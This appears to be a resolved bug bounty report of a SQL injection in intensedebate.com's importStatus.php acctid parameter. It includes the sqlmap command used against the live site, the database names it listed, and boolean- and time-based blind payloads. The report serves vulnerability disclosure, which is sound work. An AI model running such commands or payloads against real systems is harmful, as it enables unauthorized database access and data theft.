SQL Injection intensedebate.com
Medium
A
Automattic
Submitted None
Actions:
Reported by
lu3ky-13
Vulnerability Details
Technical details and impact analysis
hello dear support
I have found SQL Injection on intensedebate.com
parameters injectable ?acctid=1
URL:https://www.intensedebate.com/js/importStatus.php?acctid=1
I'm used sqlmap to injection
command
sqlmap --url https://www.intensedebate.com/js/importStatus.php?acctid=1 --dbs
{F1140562}
available databases [3]:
[*] heartbeat
[*] id_comments
[*] information_schema
Parameter: acctid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: acctid=1 AND 1726=1726
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: acctid=1 AND (SELECT 8327 FROM (SELECT(SLEEP(5)))yrDl)
## Impact
An attacker can use SQL injection it to bypass a web application's authentication and authorization mechanisms and retrieve the contents of an entire database. SQLi can also be used to add, modify and delete records in a database, affecting data integrity. Under the right circumstances, SQLi can also be used by an attacker to execute OS commands, which may then be used to escalate an attack even further.
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
SQL Injection